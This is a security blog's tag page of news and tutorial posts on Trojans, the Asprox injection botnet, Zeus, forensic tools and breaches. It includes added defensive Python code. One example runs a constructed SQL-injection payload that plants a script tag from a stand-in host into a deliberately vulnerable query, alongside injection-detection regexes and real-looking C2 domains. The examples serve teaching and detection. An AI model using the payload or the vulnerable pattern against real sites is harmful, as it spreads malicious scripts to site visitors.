Posts Tagged Cybercrime & Hacking

Fake Windows IME Trojan

Security researchers at Websense have discovered a new Trojan that installs itself as a Windows input method editor (IME) in order to disable and delete antivirus software and take over the victim's machine.

The malicious program registers itself as the Windows input method editor, stops every antivirus process it knows about, deletes the antivirus executables, and disguises itself on the system as an antivirus update package.

Websense has published a blog post describing how the Trojan infects a Windows system. After the malware runs, a file named winnea.ime is created in the Windows system folder.

When the default input method is opened, the previously created winnea.ime starts searching for and detecting installed antivirus products.

At the same time, winnea.ime drops a file called pcij.sys into the system folder and loads it as a kernel driver.

The user-mode component then sends control codes to the pcij.sys driver through DeviceIoControl, and the driver kills the running process of every antivirus product on its list. Doing the killing from kernel mode is what lets it get past the self-protection of the AV processes.

It is clear that the Windows input method has become a popular way for attackers to get malicious code loaded: an IME is loaded into every process that uses that input method, so it is both a persistence and an injection mechanism.
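As an added example (this is not code from the Websense post), the Python below performs the check a responder would want after reading the above: it parses a `reg export` of the Keyboard Layouts key, where every IME is registered through an "Ime File" value, and flags any IME file that is not on a baseline taken from a known-good host. The registry excerpt, the layout IDs, the baseline set and the placement of the winnea.ime entry are all constructed for this example; that the Trojan registers through this key is an assumption about how IMEs are installed, not a detail from the post.

```python
import re

# Constructed excerpt of: reg export "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layouts"
# The layout IDs, texts and the winnea.ime entry are made up for this example; they
# mirror how a real IME is registered (an "Ime File" value under a layout key).
SAMPLE_REG_EXPORT = r"""
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000409]
"Layout File"="KBDUS.DLL"
"Layout Text"="US"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\E0200804]
"Ime File"="PINTLGNT.IME"
"Layout Text"="Chinese (Simplified) - Microsoft Pinyin"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\E0210804]
"Ime File"="winnea.ime"
"Layout Text"="Chinese (Simplified) - Microsoft Pinyin"
"""

# Assumed baseline: IME file names exported from a known-good build of the same
# Windows version. Generate it yourself from a clean host; do not trust this list.
KNOWN_GOOD_IMES = {"pintlgnt.ime"}

KEY_RE = re.compile(
    r"^\[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\"
    r"([0-9A-Fa-f]{8})\]$"
)
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_keyboard_layouts(reg_text):
    """Return {layout_id: {value_name: value}} for every layout key in the export."""
    layouts = {}
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        key = KEY_RE.match(line)
        if key:
            current = key.group(1).upper()
            layouts[current] = {}
            continue
        if current is None:
            continue
        value = VALUE_RE.match(line)
        if value:
            # .reg exports escape backslashes; undo that so path values read normally.
            layouts[current][value.group(1)] = value.group(2).replace("\\\\", "\\")
    return layouts


def find_unexpected_imes(layouts, baseline):
    """List (layout_id, ime_file, layout_text) for every IME outside the baseline."""
    findings = []
    for layout_id, values in sorted(layouts.items()):
        ime = values.get("Ime File")
        if ime and ime.lower() not in baseline:
            findings.append((layout_id, ime, values.get("Layout Text", "")))
    return findings


if __name__ == "__main__":
    hits = find_unexpected_imes(parse_keyboard_layouts(SAMPLE_REG_EXPORT), KNOWN_GOOD_IMES)
    for layout_id, ime, text in hits:
        print(f"suspicious IME: layout {layout_id} loads {ime} ({text})")
```

A hit is a lead, not a verdict: hash the flagged file for a known-file lookup, check its Authenticode signature (Sysinternals sigcheck does this), and look for the companion driver (here pcij.sys) in the loaded driver list before calling it malicious.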

make sure you subscribe to my RSS feed!


Asprox is back!

Security researchers warn of a rapid increase in websites infected by the Asprox spam botnet. Asprox is now carrying out SQL-injection attacks, and in a single night the number of compromised sites more than doubled, from 5,000 to 11,000.

The bot usually starts by scanning for vulnerable hosts; when it finds a vulnerable website it attacks that host.

M86 Security is currently monitoring and tracking the new threat. In a blog post, Rodel Mendrez reported that Asprox's behaviour has changed: where it previously only sent spam, it now performs mass SQL injection.

As of this writing, there are three fast-flux domains that the bot attempts to contact:

CL63AMGSTART.RU
HYPERVMSYS.RU
ML63AMGSTART.RU

These three domains are the bot's command-and-control servers. Analysing the malware binary reveals embedded SQL statements, as the screenshot in the post shows.

Decrypting the XML file that the bot receives reveals information about the targeted websites (see the screenshot).

Finally, a simple Google search shows that more than 5,000 websites are already infected: the injected SQL appends a script reference to the site's stored content, so the infection is visible in the pages that the compromised sites serve.

As you can see, criminals are always searching for new ways to spread their malware.
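To make the attack and the fix concrete, here is an added example that is not part of the original post or of any Asprox analysis. It shows the vulnerable pattern (a request parameter concatenated into SQL, on a stack that runs stacked statements) beside the parameterised version, using an in-memory SQLite table of constructed rows, and then a small detector run over constructed web-server log lines. The payload shape, the `bad.example` domain, the log lines and the detection patterns are all assumptions made for the example.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed payload in the shape of a mass SQL-injection: the legitimate id is
# followed by a stacked UPDATE that appends a script tag to every row, so every page
# rendered from the table serves the attacker's JavaScript. The domain is made up.
PAYLOAD = ("1; UPDATE news SET body = body || "
           "'<script src=\"http://bad.example/js.js\"></script>'; --")


def make_db():
    """In-memory stand-in for a site's content database (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO news (title, body) VALUES (?, ?)",
                     [("First", "hello"), ("Second", "world")])
    conn.commit()
    return conn


def run_vulnerable(conn, news_id):
    """Concatenates the request parameter into SQL. sqlite3's execute() refuses
    stacked statements, so executescript() stands in for the server stacks the
    bot targeted, whose drivers run every statement in the batch."""
    sql = "SELECT id, title, body FROM news WHERE id = " + news_id + ";"
    conn.executescript(sql)


def run_hardened(conn, news_id):
    """Same query with a bound parameter: the payload is compared as a value,
    never parsed as SQL, so it simply matches no row."""
    return conn.execute(
        "SELECT id, title, body FROM news WHERE id = ?", (news_id,)
    ).fetchall()


def count_injected_rows(conn):
    return conn.execute(
        "SELECT COUNT(*) FROM news WHERE body LIKE '%<script%'"
    ).fetchone()[0]


# Detection side: patterns of the hex-encoded, stacked T-SQL batches that the
# mass-injection waves of that time used (an assumption here, not from the post).
INJECTION_RE = re.compile(
    r"declare\s*@\w+|cast\s*\(\s*0x[0-9a-f]+|exec\s*\(|;\s*update\s+\w+\s+set\s|union\s+select",
    re.IGNORECASE,
)

# Constructed web-server log lines (method, path, query string, status).
SAMPLE_LOG = [
    "GET /news.asp id=1 200",
    "GET /news.asp id=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x44454C4152452040"
    "%20AS%20VARCHAR(4000));EXEC(@S);-- 200",
    "GET /about.asp - 200",
    "GET /news.asp id=2%3BUPDATE+news+SET+body%3Dbody%2B'x' 500",
]


def flag_injection_attempts(lines):
    """Return log lines whose URL-decoded query string matches an injection pattern."""
    return [line for line in lines if INJECTION_RE.search(unquote_plus(line))]


if __name__ == "__main__":
    db = make_db()
    run_vulnerable(db, PAYLOAD)
    print("rows carrying injected script (vulnerable):", count_injected_rows(db))
    db = make_db()
    print("hardened query returned:", run_hardened(db, PAYLOAD))
    print("rows carrying injected script (hardened):", count_injected_rows(db))
    for hit in flag_injection_attempts(SAMPLE_LOG):
        print("injection attempt:", hit)
```

The detector is deliberately narrow (it matches batch and stacked-statement syntax, not every quote in a query string); run it against decoded query strings, because the bots URL- and hex-encode their payloads precisely to slip past naive string matches.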


Finding the Hidden

If an attacker manages to compromise a server, it can be used for several things: spreading malware, sending spam, attacking other hosts, or stealing and destroying sensitive information stored on it.

Restoring a previous copy of the system does not guarantee that the incident will not happen again. That is why it is important to learn how to conduct a forensic investigation and determine what really happened.

A forensic investigation helps to understand the situation after a breach so that it does not recur; updating software packages and antivirus definitions alone will not stop an attacker from using the same method to break into the system one more time.

It is also very important to determine when the attack occurred, because otherwise you may restore a backup that looks perfectly normal but was taken after the intrusion and already contains a backdoor.

The collected evidence also plays a big role in identifying where the weakness was (a system flaw, a human error or an insider).

Technology has a good face and at the same time a bad face: some modern malware leaves no traces on the hard disk at all.

For example, the SQL Slammer worm lives only in RAM and can be detected only through its network activity (UDP port 1434). Encryption is also widely used as a protective measure (BitLocker, EFS, ...), and without the key there is no access to that information.

Forensic tools help in these situations by collecting and analysing information on the compromised host. This includes:

- Tools for cloning the system and saving copies of partitions
- Tools for creating checksums and digitally signing files
- Tools for analysing network activity and system configuration
- Tools for analysing the system (processes, libraries, ...)

Depending on the situation, there are only a few commercial forensic tools on the market, such as ProDiscover from Technology Pathways, EnCase Forensic and Forensic Toolkit (FTK).

Some vendors provide limited versions, such as the ProDiscover Basic Edition freeware, which is available for download but does not include network capabilities. On the other hand, there are special Linux distributions where all the required tools are integrated and configured, such as DEFT Linux, the FCCU GNU/Linux Forensic Boot CD, Helix3 and others.

Now let's look at some forensic tools.

The first is TCT (The Coroner's Toolkit), which allows both dead and live analysis. The project was superseded by The Sleuth Kit (TSK). TSK runs on Linux, Mac OS X, Cygwin, FreeBSD, OpenBSD and Solaris and analyses data stored on NTFS, FAT, Ext2, Ext3, UFS1 and UFS2. It includes 24 utilities in the following groups:

- File System Layer (f*): works with the file system and file names (fsstat, fls, ffind)
- Meta Data Layer (i*): the structures that describe a file or directory (ils, istat, icat, ifind)
- Data Unit Layer (blk*): the actual content of blocks, clusters and fragments (blkls, blkcat, blkstat)
- File System Journal (j*): the file system's journal (jls, jcat)
- Volume System (mm*): partition table analysis (mmls, mmstat), plus the disk utilities (disk_*)

To search for or recover deleted files on a partition, we can use fls and icat. To list deleted files with fls:
# fls -rd /dev/***
-r makes the program recurse into all directories; -d shows only deleted entries. An entry marked (realloc) means the inode has since been reused by another file, so its content no longer belongs to the deleted name.
To find a particular file, pipe the listing through grep:
# fls -rd /dev/sda1 | grep -v '(realloc)' | grep file.doc
The inode printed in front of the name is what icat takes to dump the file's content (icat -r follows deleted metadata).
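The listing above can be post-processed instead of read by eye. As an added example (not from the post, and not part of The Sleuth Kit), the Python below parses `fls -rdp` output, keeps the deleted regular files whose metadata has not been reallocated, filters them by name, and prints the `icat -r` command that would recover each one. The fls output is constructed for the example; in practice it comes from a real run against a device or image file, and `/dev/sda1` is used only as the illustrative target.

```python
import re
import shlex

# Constructed `fls -rdp /dev/sda1` output. Format: type/type [*] inode[(realloc)]:<TAB>path
# "*" marks a deleted entry; "(realloc)" means the inode has since been reused by
# another file, so its content is no longer what the name suggests.
SAMPLE_FLS_OUTPUT = """\
r/r * 1523:\tDocuments/file.doc
r/r * 1523(realloc):\tDocuments/old_file.doc
d/d * 2048:\ttmp/.cache
r/r * 2051:\ttmp/.cache/ld.so.preload
-/r * 2099:\tDocuments/file.doc
r/r * 20-128-3:\tUsers/bob/file.doc
"""

FLS_LINE_RE = re.compile(
    r"^(?P<dtype>[-a-z])/(?P<mtype>[-a-z])\s+(?P<deleted>\*\s+)?"
    r"(?P<inode>\d+(?:-\d+-\d+)?)(?P<realloc>\(realloc\))?:\t(?P<path>.*)$"
)


def parse_fls(text):
    """Turn fls output into dicts; lines that do not match the format are skipped."""
    entries = []
    for line in text.splitlines():
        m = FLS_LINE_RE.match(line)
        if not m:
            continue
        entries.append({
            "meta_type": m["mtype"],            # r = regular file, d = directory
            "deleted": m["deleted"] is not None,
            "realloc": m["realloc"] is not None,
            "inode": m["inode"],                # ext: 1523; NTFS: 20-128-3 (MFT entry-type-id)
            "path": m["path"],
        })
    return entries


def recoverable_files(entries, name_pattern=None):
    """Deleted regular files whose metadata has not been reused, optionally filtered by name."""
    pat = re.compile(name_pattern) if name_pattern else None
    return [
        e for e in entries
        if e["deleted"] and not e["realloc"] and e["meta_type"] == "r"
        and (pat is None or pat.search(e["path"]))
    ]


def icat_commands(image, entries, outdir="recovered"):
    """Shell commands that dump each entry's content; icat -r follows deleted metadata."""
    cmds = []
    for e in entries:
        out = f"{outdir}/{e['inode']}_{e['path'].replace('/', '_')}"
        cmds.append(f"icat -r {shlex.quote(image)} {e['inode']} > {shlex.quote(out)}")
    return cmds


if __name__ == "__main__":
    hits = recoverable_files(parse_fls(SAMPLE_FLS_OUTPUT), r"file\.doc$")
    for cmd in icat_commands("/dev/sda1", hits):
        print(cmd)
```

Two things the filter encodes that are easy to forget when working by hand: a directory entry for a deleted file can point at an inode that now belongs to a different, live file (the realloc case), and on NTFS the "inode" is an MFT address with attribute type and id, so it must be kept as a string rather than parsed as a number.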

To identify known files (and filter them out of the investigation), we can use hfind, which looks up hash values in a database using a binary search. This makes it easy to build a hash database and check whether a file is known or not.

It works with the NIST National Software Reference Library (NSRL) and with the output of md5sum. The NSRL project is supported by reputable organizations such as the National Institute of Justice (NIJ) of the U.S. Department of Justice and the National Institute of Standards and Technology (NIST).

For example, to create an MD5 index file for the NIST NSRL:

# hfind -i nsrl-md5 /usr/local/hash/nsrl/NSRLFile.txt
To look up a value in the NSRL:
# hfind /usr/local/hash/nsrl/NSRLFile.txt 76b1f4de1522c20b67acc132937cf82e
76b1f4de1522c20b67acc132937cf82e Hash Not Found
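To show what hfind does under the hood, here is an added example (not hfind's code, and not from the post): it builds a sorted index from NSRL-style CSV rows and from md5sum output, then answers lookups by binary search, the way `hfind -i` followed by `hfind <db> <hash>` does. The NSRL rows and md5sum lines are constructed (their hashes are computed from made-up content, so they are not real NSRL entries); the empty-file MD5 is the one real constant.

```python
import bisect
import csv
import hashlib
import io


def _md5(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


# Constructed rows in NSRLFile.txt's column layout; the SHA-1 and CRC32 columns are
# zero-filled because only the MD5 and FileName columns are used here.
NSRL_SAMPLE = "\n".join([
    '"SHA-1","MD5","CRC32","FileName","FileSize","ProductCode","OpSystemCode","SpecialCode"',
    '"%s","%s","00000000","calc.exe","4","1","358",""' % ("0" * 40, _md5(b"calc")),
    '"%s","%s","00000000","notepad.exe","7","1","358",""' % ("0" * 40, _md5(b"notepad")),
]) + "\n"

# Constructed md5sum output (hash, two spaces, path), e.g. a local known-bad set.
MD5SUM_SAMPLE = "\n".join([
    "d41d8cd98f00b204e9800998ecf8427e  /tmp/empty",       # MD5 of the empty file
    _md5(b"MZ dropper bytes") + "  /tmp/winnea.ime",       # a locally hashed suspect file
]) + "\n"


def build_index(nsrl_text=None, md5sum_text=None):
    """Equivalent of `hfind -i`: a sorted list of digests plus the parallel list of names."""
    rows = []
    if nsrl_text:
        for row in csv.DictReader(io.StringIO(nsrl_text)):
            rows.append((row["MD5"].lower(), row["FileName"]))
    if md5sum_text:
        for line in md5sum_text.splitlines():
            digest, _, path = line.partition("  ")
            if len(digest) == 32 and path:
                rows.append((digest.lower(), path))
    rows.sort()
    return [d for d, _ in rows], [n for _, n in rows]


def lookup(index, digest):
    """Binary-search the index; return every name recorded for digest, or None."""
    keys, names = index
    digest = digest.lower()
    i = bisect.bisect_left(keys, digest)
    found = []
    while i < len(keys) and keys[i] == digest:
        found.append(names[i])
        i += 1
    return found or None


def classify_file(index, data: bytes) -> str:
    """hfind-style verdict for a file's content: the known names, or 'Hash Not Found'."""
    names = lookup(index, _md5(data))
    return "known: " + ", ".join(names) if names else "Hash Not Found"


INDEX = build_index(NSRL_SAMPLE, MD5SUM_SAMPLE)

if __name__ == "__main__":
    for digest in (_md5(b"calc"), "76b1f4de1522c20b67acc132937cf82e"):
        print(digest, lookup(INDEX, digest) or "Hash Not Found")
    print(classify_file(INDEX, b""))
```

One caveat: a match against a known-good set only says the content is a file NIST has catalogued, not that the path or the way it is loaded is benign, and since MD5 collisions are cheap to produce, prefer the SHA-1 (or better) column when the set is used to clear files rather than merely to find them.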

The Sleuth Kit contains a large number of utilities, which makes it hard to keep track of them; for that there is a front end on the official website, the Autopsy Forensic Browser, an HTML-based graphical interface to the TSK command-line tools. It makes investigating a system much easier and faster.

Sysinternals is also very important for forensic work. To get the whole package, download the Sysinternals Suite. The Sysinternals tools give comprehensive information on everything loaded on the system, such as logs and processes; Autoruns, for instance, displays every registry key, driver, DLL, codec and so on that is configured to load.

PsInfo, PsLogList and Process Explorer give complete information on the system and its running processes. ListDLLs lists the loaded DLLs with their versions and the path they were loaded from. Handle shows the open files (and other handles) together with the process that opened each of them.

Also look at LogonSessions, PendMoves, PsFile, PsLoggedOn, TCPVcon and TCPView, as well as the standard ipconfig, netstat, arp, openfiles and systeminfo.

The tools are distributed as freeware. Physical memory can be captured with ManTech Memory DD, which supports Windows 2000, Windows Server 2003, Windows XP, Windows Vista and Windows Server 2008; this gives you, for free, functionality that is a paid option in EnCase. Capture memory before anything else, since RAM-only malware (like the Slammer example above) is lost the moment the machine is powered off.

This is a quick list of free tools to help in conducting a forensic analysis.


Building your OWN Malware Lab (Part 2)

Today's malware strategies and tactics are advanced and sophisticated, mainly in order to evade antivirus products. Some samples use encryption to make detection difficult for security software, others add autorun registry entries to re-establish themselves against anti-malware tools, or simply add lines to the hosts file to stop the antivirus from updating its definitions.

ThreatExpert is an automated threat analysis system designed to analyse and report the behaviour of viruses, worms, trojans, adware, spyware and other security risks in a fully automated way. The report ThreatExpert produces contains very important information about a file and is divided into two parts:

- Submission Summary:

- Submission details (date, processing time and malware aliases).
- Summary of findings: the severity level and the impact on the machine (for example "creates a startup registry entry" or "contains characteristics of an identified security risk").

- Technical Details:

- Possible security risk: the threat category with a short description.
- File system modifications (file names created or modified by the malware, file size, file hash, alias and a brief note about each affected file).
- Memory modifications (new processes created on the system).
- Registry modifications (registry values created, modified or deleted).
- Other details (possible country of origin according to the analysis).

To use ThreatExpert, go through the Free Online File Scanner or install the ThreatExpert Submission Applet for a quick and easy way to submit samples; before submitting any files you need to register an account in order to retrieve the reports.

What all the previous tools miss is analysis of suspicious network traffic. For web-based threats we can use Anubis: submit a suspicious URL and receive a report showing all the activity of the Internet Explorer process while it visits that URL. The downside is that the service is slow.

Flash, JavaScript and PDF files can be handled with Wepawet. Wepawet runs various analyses on the URLs or files you submit; at the end of the analysis it tells you whether the resource is malicious and provides information to help you understand why it was classified that way. It also displays information that greatly simplifies the manual analysis and understanding of a malicious sample's behaviour.

Another tool for analysing Portable Executable (PE) files is MANDIANT Red Curtain (MRC). MRC examines multiple aspects of an executable, such as entropy (in other words, randomness), indications of packing, compiler and packer signatures, the presence of digital signatures and other characteristics, to generate a threat "score". The score can be used to decide whether a set of files is worth further investigation.
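To show what an entropy-and-packing score actually measures, here is an added example (it is not MRC's code and not from the post): a minimal PE section-table reader, per-section Shannon entropy, and a few indicators combined into a score. The sample PE is constructed in code with just enough structure for the reader, the packer section-name list and the 7.0 entropy threshold are assumptions, and the real MRC weighs more signals (compiler signatures, Authenticode) than this does.

```python
import math
import random
import struct
from collections import Counter

# Section names that common packers leave behind (assumed list for this example).
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata", ".petite", "MPRESS1", ".themida"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ~0 for padding, ~4-6 for code/text, close to 8 for compressed or encrypted data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image: bytes):
    """Minimal PE section-table reader: DOS header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> sections.
    Returns (name, virtual_size, raw_size, raw_bytes) per section."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew, = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", image, coff + 2)
    opt_size, = struct.unpack_from("<H", image, coff + 16)
    table = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        name, vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, table + 40 * i)
        name = name.rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, vsize, raw_size, image[raw_ptr:raw_ptr + raw_size]))
    return sections


def score_sections(sections):
    """Per-section indicators in the spirit of MRC's score (thresholds are assumptions)."""
    report = []
    for name, vsize, raw_size, data in sections:
        reasons = []
        ent = shannon_entropy(data)
        if ent > 7.0:
            reasons.append("high entropy")
        if name in PACKER_SECTION_NAMES:
            reasons.append("packer section name")
        if raw_size == 0 and vsize > 0:
            reasons.append("empty on disk, populated at runtime")
        report.append((name, round(ent, 2), reasons))
    return report


def threat_score(report):
    return sum(len(reasons) for _, _, reasons in report)


def build_sample_pe(sections):
    """Constructed PE32 image with just enough structure for pe_sections(); not a real binary.
    sections: list of (name, raw_bytes, virtual_size)."""
    e_lfanew, opt_size = 0x40, 0xE0
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = b"\x0B\x01" + b"\0" * (opt_size - 2)          # PE32 magic, rest zeroed
    raw_ptr = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    table, body = b"", b""
    for name, data, vsize in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, 0x1000,
                             len(data), raw_ptr if data else 0, 0, 0, 0, 0, 0x60000020)
        body += data
        raw_ptr += len(data)
    return dos + b"PE\0\0" + coff + opt + table + body


# Constructed sample: a low-entropy code section next to UPX-style sections, where the
# packed payload sits in a high-entropy UPX1 and UPX0 is empty on disk.
SAMPLE_SECTIONS = [
    (".text", b"\x90" * 512 + bytes(range(32)) * 16, 1024),
    ("UPX0", b"", 0x10000),
    ("UPX1", random.Random(7).randbytes(4096), 4096),
]
SAMPLE_PE = build_sample_pe(SAMPLE_SECTIONS)

if __name__ == "__main__":
    report = score_sections(pe_sections(SAMPLE_PE))
    for name, ent, reasons in report:
        print(f"{name:<8} entropy={ent:.2f} {', '.join(reasons) or '-'}")
    print("threat score:", threat_score(report))
```

High entropy alone is not proof of packing (resource sections holding compressed images or embedded certificates score high too), which is why MRC, and this example, combine it with structural hints such as a section that is empty on disk but large in memory.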


Building your OWN Malware Lab (Part 1)

Malicious software such as viruses, worms and bots is currently one of the largest threats to the security of the Internet. Antivirus labs invest a great deal of money in analysing and reversing malware, but for our purposes we can perform the analysis with a few useful tools on our own PC.

Let's start with www.virustotal.com. If I think a file is suspicious, the first thing I do is upload it to VirusTotal. VirusTotal analyses any file with more than 40 antivirus products using their latest signature definitions, which gives a clear idea not only of whether the file is detected but also of which AV engines catch it (keep in mind that zero detections does not prove a file is clean, only that no signature matched yet). The file can be uploaded directly from the site over SSL or sent by email. You can also download and install the uploader, which lets you send files straight from your system through the context menu.

Today, reversing malware means knowing its behaviour. You would run the program and watch the changes it makes to the system, but that can harm the main system; for this we need Sandboxie. Sandboxie runs your programs in an isolated space that prevents them from making permanent changes to other programs and data on your computer. After installing Sandboxie you have a wide choice of tools for detecting and monitoring changes on the system: Process Monitor from Sysinternals, API Monitor, or the free analysis tools from iDefense Labs. Note that Sandboxie contains file and registry writes, it is not a virtual machine, so still run samples on a dedicated analysis box rather than on the machine you work from.

CWSandbox is another very nice tool for malware analysis that fulfils the three design criteria of automation, effectiveness and correctness for the Win32 family of operating systems. CWSandbox traces and monitors all relevant system calls and generates an automated report that describes:

• which files the malware sample has created or modified,
• which changes the malware sample made to the Windows registry,
• which dynamic link libraries (DLLs) were loaded before execution,
• which virtual memory areas were accessed,
• which processes were created, which network connections were opened and what information was sent over them.

Malware can be very hard to remove, and sometimes the best approach to cleaning an infected machine is to restore a clean copy of the operating system. This brings us to the end of the first part of the Building your own Malware Lab series.


Zeus Trojan infected machines in 2,500 corporations around the globe

Over the past 18 months more than 75,000 machines worldwide have been infected by the Zeus Trojan, according to NetWitness; the infected computers were used to steal online banking, social networking and email credentials.

Among the victims are major companies such as Merck, Cardinal Health, Paramount Pictures and Juniper Networks. NetWitness reported that the cybercriminals are probably an Eastern European group operating through a server located in Germany, and that they spread the malware through emails carrying it or by redirecting victims to malicious websites.

The activity does not stop there: on 26 January the researchers found 76 gigabytes of data stolen by the Trojan, including 68,000 corporate logins as well as online banking, Facebook, Yahoo and Hotmail credentials.

According to NetWitness the attackers are still actively exploiting vulnerabilities to spread the malware around the globe and control the infected machines remotely, among other ways through the Waledac peer-to-peer botnet.

ZeuS consists of two main parts:
1. Command and control (the panel): a set of scripts, including the admin area, installed on the server.
2. Bot: the Win32 client that runs on the victim (the Trojan itself).

The main features of Zeus are:
1- Invisible in the Windows process list.
2- Bypasses most firewalls.
3- Works under restricted (non-administrator) Windows accounts.
4- The main bot body is encrypted.
5- Disables the Windows Firewall, which opens the way for incoming messages and commands.
6- All settings, including configuration, logs and commands, pass over encrypted HTTP (HTTPS).
7- A separate configuration file lets the operators find their bots again when they lose access to the main server.
8- A backup configuration file is available in case the main config is lost.
9- Works inside the browser by hooking the browser's networking library (wininet.dll for Internet Explorer and AOL; Mozilla Firefox is hooked through its own network library), so traffic is read before or after SSL.
10- Intercepts all activity on the machine through a built-in keylogger.
11- Simple, transparent URL redirection to fake websites (GET/POST requests, etc.).
12- Grabs all SSL/TLS client certificates imported by the victim and sends them to the server.
13- POP3 and FTP credential grabber.
14- Searches the hard disk and uploads any file the attacker asks for.
15- Real-time screenshots.

As you can see, it is very easy for criminals to get at anyone's sensitive information. Keeping your AV and system definitions up to date gives you the best baseline protection against new threats, but note from the feature list that Zeus is built to sit inside the browser and to evade signature-based detection, so a clean AV scan on its own is no guarantee for a machine used for online banking.


Cybercriminals run a phishing attack on .gov and .mil addresses

Criminals are conducting spam attacks against email addresses in the .gov and .mil domains. According to a post on Brian Krebs's blog, the fake messages contain a link that leads to the Zeus Trojan, which steals online banking passwords.

Such attacks succeed because the phishing message looks quite legitimate: recipients are invited to download the report "2020 Project", which really exists and was recently published by the National Intelligence Council of the United States.

Investigating the email headers, however, shows that the real sender is nobody@sh16.ruskyhost.ru, a Russian address. The From: line is trivially forged; the Received: headers added by intermediate mail servers are what to read.

Only 16 of 39 antivirus engines detected the malware as a Trojan, because the cybercriminals keep repacking their bot to evade different AV products (F-Secure flagged it only as Suspicious:W32/Riskware!Online).


Hackers Target Internet Forum Database

Boards.ie, a popular Irish discussion forum, has today been forced to reset all users' passwords after a security breach in which attackers compromised part of the user database on the server.

Tom Murphy, one of the portal's founders, said in an official statement that the site is “regularly the target for disruption and take continual actions to proactively protect data”.

During the attack the hackers gained access to part of the main database server that stores usernames, email addresses and encrypted passwords for registered users. As a security measure the site reset all users' logins and passwords and recommended that subscribers do not reuse the same credentials on other websites, to prevent identity theft. The advice matters because "encrypted" (hashed) passwords can still be cracked offline once the database is in the attackers' hands, and a cracked password is immediately tried against the victim's other accounts.

The site started life as a forum for the computer game Quake in 1998 and now has more than 500 forums on a range of topics.

According to the most recent ABC internet traffic statistics, for November, Boards.ie had more than 20m page views, averaging more than 1.1m page views a day.


Hacking Cocktail for the Halloween!

Cybercriminals do not let any occasion or event pass without trying to earn more illegal income or distribute their malware. Here are some cases of Internet scams and email tricks around Halloween, detected by Viruslist. Cheap software (screenshot):

Emails from illegitimate sources advertising costumes and personalised gifts (screenshot):

E-cards for Halloween (screenshot):

Another, more unusual case: this site offers a browser toolbar that you must install to send a greeting card. If the victim is in the US, Canada or certain other countries, the spammer is paid by the toolbar developer, and the toolbar itself can be any kind of malicious code that takes control of the PC (screenshot):

If the victim comes from a Russian IP address, he is redirected to a lottery site instead (screenshot):

This is entirely expected: hackers are always promoting their links through spam and redirection, accompanied by text intended to attract interest. These attacks aim to spread malware, make illegal money or harvest personal credentials. Happy Halloween!

Screenshots sourced from the Viruslist website.


4shared.com Owned!

Yesterday it was reported that 4shared.com had been compromised by members of the Anti-sec group. At first many people did not believe that the popular file-sharing portal had been hacked, until official sources confirmed the incident.

The attack took place at the end of last week; every user who tried to visit or check their files on http://www.4shared.com got a different page reading “I love Morocco”. So far there are no details about the attack (whether DNS poisoning, a PHP include, ...) or about what type of vulnerability was exploited.

This incident casts doubt on the security level of the 4shared.com portal, even though many users confirmed that everything seems to still be there. Any information stored anywhere can be extracted by attackers, and nothing prevents us from encrypting the information we store, in whatever form we like. The important part is being able to decrypt those files afterwards :-) .

The site is working again and open for uploads, but do not leave your data unsecured.


Fusion theme by digitalnature | powered by WordPress